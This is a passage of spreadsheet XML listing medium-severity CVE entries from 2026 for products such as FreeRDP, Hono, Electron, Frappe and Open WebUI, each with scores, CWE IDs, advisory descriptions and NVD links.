      <c r="C5113" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5113" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5113" s="5" t="inlineStr"/>
      <c r="F5113" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5113" s="5" t="inlineStr"/>
      <c r="H5113" s="5" t="inlineStr"/>
      <c r="I5113" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5113" s="5" t="inlineStr"/>
      <c r="K5113" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L5113" s="5" t="inlineStr">
        <is>
          <t>A malformed Bluetooth connection request message can cause the BT122 to leak potentially sensitive information. See vulnerability B-E4 in the related paper below.</t>
        </is>
      </c>
      <c r="M5113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65933</t>
        </is>
      </c>
    </row>
    <row r="5114">
      <c r="A5114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65936</t>
        </is>
      </c>
      <c r="C5114" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5114" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5114" s="5" t="inlineStr"/>
      <c r="F5114" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5114" s="5" t="inlineStr"/>
      <c r="H5114" s="5" t="inlineStr"/>
      <c r="I5114" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5114" s="5" t="inlineStr"/>
      <c r="K5114" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L5114" s="5" t="inlineStr">
        <is>
          <t>A malformed Bluetooth connection request message can cause the RS9116W/SiWx917 to leak potentially sensitive information. 
See vulnerability B-E4 in the related paper below.</t>
        </is>
      </c>
      <c r="M5114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65936</t>
        </is>
      </c>
    </row>
    <row r="5115">
      <c r="A5115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66058</t>
        </is>
      </c>
      <c r="C5115" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5115" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5115" s="5" t="inlineStr"/>
      <c r="F5115" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5115" s="5" t="inlineStr"/>
      <c r="H5115" s="5" t="inlineStr"/>
      <c r="I5115" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5115" s="5" t="inlineStr"/>
      <c r="K5115" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L5115" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 16.20.0 and 15.112.0, unrestricted access to a Document Follow API (update_follow) is possible for an authenticated user.
This issue is fixed in versions 16.20.0 and 15.112.0.</t>
        </is>
      </c>
      <c r="M5115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66058</t>
        </is>
      </c>
    </row>
    <row r="5116">
      <c r="A5116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66059</t>
        </is>
      </c>
      <c r="C5116" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5116" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5116" s="5" t="inlineStr"/>
      <c r="F5116" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5116" s="5" t="inlineStr"/>
      <c r="H5116" s="5" t="inlineStr"/>
      <c r="I5116" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5116" s="5" t="inlineStr"/>
      <c r="K5116" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5116" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 16.20.0 and 15.112.0, a field-level permissions bypass exposes restricted DocType fields. This issue is fixed in versions 16.23.0 and 15.112.0.</t>
        </is>
      </c>
      <c r="M5116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66059</t>
        </is>
      </c>
    </row>
    <row r="5117">
      <c r="A5117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66062</t>
        </is>
      </c>
      <c r="C5117" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5117" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5117" s="5" t="inlineStr"/>
      <c r="F5117" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5117" s="5" t="inlineStr"/>
      <c r="H5117" s="5" t="inlineStr"/>
      <c r="I5117" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5117" s="5" t="inlineStr"/>
      <c r="K5117" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L5117" s="5" t="inlineStr">
        <is>
          <t>SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.70.2, the content negotiation header parser used by SvelteKit's request handling (for headers such as Accept) uses a regular expression vulnerable to quadratic backtracking, so a maliciously crafted header value can cause excessive CPU consumption and degrade or deny service. Version 2.70.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M5117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66062</t>
        </is>
      </c>
    </row>
    <row r="5118">
      <c r="A5118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66778</t>
        </is>
      </c>
      <c r="C5118" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5118" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5118" s="5" t="inlineStr"/>
      <c r="F5118" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5118" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5118" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I5118" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5118" s="5" t="inlineStr"/>
      <c r="K5118" s="5" t="inlineStr">
        <is>
          <t>CWE-644</t>
        </is>
      </c>
      <c r="L5118" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently sanitize certain request headers before forwarding traffic to internal components. An unauthenticated attacker could send a specially crafted request to obtain limited unauthorized access to information. This results in a low impact on confidentiality. There is no impact on integrity and availability.</t>
        </is>
      </c>
      <c r="M5118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66778</t>
        </is>
      </c>
    </row>
    <row r="5119">
      <c r="A5119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67302</t>
        </is>
      </c>
      <c r="C5119" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5119" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5119" s="5" t="inlineStr"/>
      <c r="F5119" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5119" s="5" t="inlineStr"/>
      <c r="H5119" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I5119" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J5119" s="5" t="inlineStr"/>
      <c r="K5119" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="L5119" s="5" t="inlineStr">
        <is>
          <t>FreeRDP before 3.29.0 (affected versions &lt;= 3.28.0) contains a divide-by-zero vulnerability in the rdpecam camera redirection client. ecam_dev_process_start_streams_request() parses a server-controlled CAM_MEDIA_TYPE_DESCRIPTION from a StartStreamsRequest PDU but validates only Format and Flags, not FrameRateDenominator. When a malicious or compromised RDP server sends a StartStreamsRequest with FrameRateDenominator set to zero, ecam_encoder_context_init() (channels/rdpecam/client/encoding.c) computes FrameRateNumerator / FrameRateDenominator, causing an integer division by zero (SIGFPE) and termination of the FreeRDP client process. Camera redirection must be enabled on the client for the channel to be reachable. Fixed in FreeRDP 3.29.0.</t>
        </is>
      </c>
      <c r="M5119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67302</t>
        </is>
      </c>
    </row>
    <row r="5120">
      <c r="A5120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67306</t>
        </is>
      </c>
      <c r="C5120" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5120" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5120" s="5" t="inlineStr"/>
      <c r="F5120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5120" s="5" t="inlineStr"/>
      <c r="H5120" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I5120" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J5120" s="5" t="inlineStr"/>
      <c r="K5120" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5120" s="5" t="inlineStr">
        <is>
          <t>FreeRDP versions 3.28.0 and earlier contain an out-of-bounds read vulnerability in the RDP6 planar RLE bitmap decoder functions planar_decompress_plane_rle and planar_decompress_plane_rle_only in libfreerdp/codec/planar.c. Only the 1-byte control byte is bounds-checked; the subsequent 0–15 attacker-declared raw bytes are read without validating that the source buffer contains them. A malicious or compromised RDP server can send a truncated planar-encoded bitmap or surface update (reachable via both the Bitmap Update PDU and RDPGFX Surface Command paths) that causes the client to read past the end of the source buffer. The issue is fixed in FreeRDP 3.29.0.</t>
        </is>
      </c>
      <c r="M5120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67306</t>
        </is>
      </c>
    </row>
    <row r="5121">
      <c r="A5121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67310</t>
        </is>
      </c>
      <c r="C5121" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5121" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5121" s="5" t="inlineStr"/>
      <c r="F5121" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5121" s="5" t="inlineStr"/>
      <c r="H5121" s="5" t="inlineStr"/>
      <c r="I5121" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J5121" s="5" t="inlineStr"/>
      <c r="K5121" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5121" s="5" t="inlineStr">
        <is>
          <t>OpenRemote (org.openremote:openremote) versions &lt;= 1.26.2 contain an insecure direct object reference vulnerability in the setAssetLinks endpoint of AlarmResourceImpl. The realm access check validates only a single realm obtained via realms.stream().findFirst() on a HashSet of realms from the request, rather than all realms. Because HashSet iteration order is non-deterministic, an authenticated attacker who includes alarm-asset links from both their own realm and a victim realm can, with roughly 50% probability per request (retryable), persist cross-tenant links and disclose victim asset names (returned via @Formula fields) through GET requests on the attacker's own alarm. Fixed in 1.27.0.</t>
        </is>
      </c>
      <c r="M5121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67310</t>
        </is>
      </c>
    </row>
    <row r="5122">
      <c r="A5122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67332</t>
        </is>
      </c>
      <c r="C5122" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5122" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5122" s="5" t="inlineStr"/>
      <c r="F5122" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5122" s="5" t="inlineStr"/>
      <c r="H5122" s="5" t="inlineStr"/>
      <c r="I5122" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J5122" s="5" t="inlineStr"/>
      <c r="K5122" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L5122" s="5" t="inlineStr">
        <is>
          <t>@better-auth/oauth-provider before 1.7.0-beta.4 fails to bind access-token audience to the authorization grant, allowing clients to request tokens for unrelated resources. Attackers can complete an OAuth flow and obtain access tokens whose audience targets resource servers the authorization never covered, bypassing intended authorization boundaries.</t>
        </is>
      </c>
      <c r="M5122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67332</t>
        </is>
      </c>
    </row>
    <row r="5123">
      <c r="A5123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68552</t>
        </is>
      </c>
      <c r="C5123" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5123" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5123" s="5" t="inlineStr"/>
      <c r="F5123" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5123" s="5" t="inlineStr"/>
      <c r="H5123" s="5" t="inlineStr"/>
      <c r="I5123" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5123" s="5" t="inlineStr"/>
      <c r="K5123" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L5123" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.15.0, an unauthenticated remote client can send a STUN message over TCP or TLS with a body-length field from 65520 through 65532, causing the uint16_t len variable in stun_get_message_len_str() in src/client/ns_turn_msg.c to wrap when STUN_HEADER_LENGTH is added. The framing layer then consumes only 4 through 16 bytes, treats the remaining bytes as another message, desynchronizes the stream parser, and drops the attacking client's connection. Other clients and the server process are not affected. This issue is fixed in version 4.15.0.</t>
        </is>
      </c>
      <c r="M5123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68552</t>
        </is>
      </c>
    </row>
    <row r="5124">
      <c r="A5124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69094</t>
        </is>
      </c>
      <c r="C5124" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5124" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5124" s="5" t="inlineStr"/>
      <c r="F5124" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5124" s="5" t="inlineStr"/>
      <c r="H5124" s="5" t="inlineStr"/>
      <c r="I5124" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5124" s="5" t="inlineStr"/>
      <c r="K5124" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5124" s="5" t="inlineStr">
        <is>
          <t>Admidio before 5.0.11 contains an insecure direct object reference vulnerability in the save_temporary mode of mylist_function.php that allows authenticated users to hijack list configurations. Attackers can enumerate global list UUIDs and overwrite admin-curated global lists or other users' private lists by supplying a list_uuid parameter, transferring ownership and demoting global lists to personal configurations.</t>
        </is>
      </c>
      <c r="M5124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69094</t>
        </is>
      </c>
    </row>
    <row r="5125">
      <c r="A5125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69207</t>
        </is>
      </c>
      <c r="C5125" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5125" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5125" s="5" t="inlineStr"/>
      <c r="F5125" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5125" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5125" s="5" t="inlineStr"/>
      <c r="I5125" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5125" s="5" t="inlineStr"/>
      <c r="K5125" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L5125" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.34, the built-in CORS middleware, hono/cors, is vulnerable to a regular expression denial of service (ReDoS). During a preflight OPTIONS request, the middleware parses the attacker-controlled Access-Control-Request-Headers header using a whitespace-tolerant regular expression whose backtracking makes its running time quadratic in the input length. Because the header value is bounded only by the deployment's maximum HTTP header size, a single preflight carrying a long run of whitespace can consume seconds of CPU and block request processing. On runtimes that share one execution thread across requests, this stalls concurrent requests as well, and repeated requests can render the service unresponsive. This affects the default configuration, since the vulnerable path is reached whenever cors() is used with an unset or empty allowHeaders. Applications that set a non-empty allowHeaders are not affected. This issue is fixed in version 4.12.34.</t>
        </is>
      </c>
      <c r="M5125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69207</t>
        </is>
      </c>
    </row>
    <row r="5126">
      <c r="A5126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70466</t>
        </is>
      </c>
      <c r="C5126" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5126" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5126" s="5" t="inlineStr"/>
      <c r="F5126" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5126" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H5126" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortiweb</t>
        </is>
      </c>
      <c r="I5126" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5126" s="5" t="inlineStr"/>
      <c r="K5126" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L5126" s="5" t="inlineStr">
        <is>
          <t>A incomplete list of disallowed inputs vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4 all versions, FortiWeb 7.2 all versions, FortiWeb 7.0 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M5126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70466</t>
        </is>
      </c>
    </row>
    <row r="5127">
      <c r="A5127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70487</t>
        </is>
      </c>
      <c r="C5127" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5127" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5127" s="5" t="inlineStr"/>
      <c r="F5127" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5127" s="5" t="inlineStr"/>
      <c r="H5127" s="5" t="inlineStr"/>
      <c r="I5127" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5127" s="5" t="inlineStr"/>
      <c r="K5127" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5127" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.8 until 0.11.0, inline direct model metadata accepted client-supplied knowledge attachments without filtering them against the caller's read access. Any authenticated user who knew another user's file id could have the builtin knowledge tools return indexed chunks from that file, causing a read-only cross-user confidentiality loss while leaving knowledge-base permissions and saved workspace model validation unaffected. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M5127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70487</t>
        </is>
      </c>
    </row>
    <row r="5128">
      <c r="A5128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70575</t>
        </is>
      </c>
      <c r="C5128" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5128" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5128" s="5" t="inlineStr"/>
      <c r="F5128" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G5128" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5128" s="5" t="inlineStr"/>
      <c r="I5128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5128" s="5" t="inlineStr"/>
      <c r="K5128" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L5128" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Schannel allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M5128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70575</t>
        </is>
      </c>
    </row>
    <row r="5129">
      <c r="A5129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70607</t>
        </is>
      </c>
      <c r="C5129" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5129" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5129" s="5" t="inlineStr"/>
      <c r="F5129" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5129" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5129" s="5" t="inlineStr"/>
      <c r="I5129" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5129" s="5" t="inlineStr"/>
      <c r="K5129" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5129" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, some window options supplied by web content in the window.open() features string were applied to the new BrowserWindow without an allowlist. Untrusted content could set window options it should not control, including options that cause the main process to access attacker-chosen file or network paths, when untrusted content can call window.open() and the app does not override child window options via setWindowOpenHandler or overrideBrowserWindowOptions. This issue is fixed in 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M5129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70607</t>
        </is>
      </c>
    </row>
    <row r="5130">
      <c r="A5130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71216</t>
        </is>
      </c>
      <c r="C5130" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5130" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5130" s="5" t="inlineStr"/>
      <c r="F5130" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5130" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H5130" s="5" t="inlineStr"/>
      <c r="I5130" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5130" s="5" t="inlineStr"/>
      <c r="K5130" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L5130" s="5" t="inlineStr">
        <is>
          <t>PagerDuty alarm hook transmits the integration routing key over cleartext HTTP.
PagerDuty serves this endpoint over HTTPS and will
normally answer plain HTTP with a redirect. That does not remove the exposure.
The initial POST -- including the JSON body containing the routing key -- is
written to the socket unencrypted before any redirect response is received.
Redirection affects only whether the request is retried securely, not whether
the first copy left the host in the clear.
This issue affects Apache SkyWalking: from 9.6.0 through 11.0.0.
Users are recommended to upgrade to version 11.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M5130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71216</t>
        </is>
      </c>
    </row>
    <row r="5131">
      <c r="A5131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71408</t>
        </is>
      </c>
      <c r="C5131" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5131" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5131" s="5" t="inlineStr"/>
      <c r="F5131" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5131" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H5131" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortios</t>
        </is>
      </c>
      <c r="I5131" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5131" s="5" t="inlineStr"/>
      <c r="K5131" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5131" s="5" t="inlineStr">
        <is>
          <t>A allocation of resources without limits or throttling vulnerability in Fortinet FortiOS 7.6.0 through 7.6.6, FortiOS 7.4 all versions, FortiOS 7.2 all versions may allow attacker to denial of service via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M5131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71408</t>
        </is>
      </c>
    </row>
    <row r="5132">
      <c r="A5132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71433</t>
        </is>
      </c>
      <c r="C5132" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5132" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5132" s="5" t="inlineStr"/>
      <c r="F5132" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5132" s="5" t="inlineStr"/>
      <c r="H5132" s="5" t="inlineStr"/>
      <c r="I5132" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5132" s="5" t="inlineStr"/>
      <c r="K5132" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="L5132" s="5" t="inlineStr">
        <is>
          <t>LangGraph Checkpoint Postgres and SQLite Checkpoint are the Postgres and SQLite implementations of LangGraph's checkpoint saver. Prior to 3.1.1, the langgraph-checkpoint-postgres and langgraph-checkpoint-sqlite packages persisted hierarchical namespaces as a dot joined string and scoped reads by matching that string as a simple prefix pattern, so a read scoped to one namespace could also match a sibling namespace whose flattened form shares the same leading characters, or a namespace label containing unescaped pattern metacharacters, allowing an authenticated caller to retrieve stored items belonging to another tenant or user through an ordinary scoped search or list namespaces call, with no crafted input required. This issue is fixed in versions 3.1.1 of langgraph-checkpoint-postgres and langgraph-checkpoint-sqlite.</t>
        </is>
      </c>
      <c r="M5132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71433</t>
        </is>
      </c>
    </row>
    <row r="5133">
      <c r="A5133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71434</t>
        </is>
      </c>
      <c r="C5133" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5133" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5133" s="5" t="inlineStr"/>
      <c r="F5133" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5133" s="5" t="inlineStr"/>
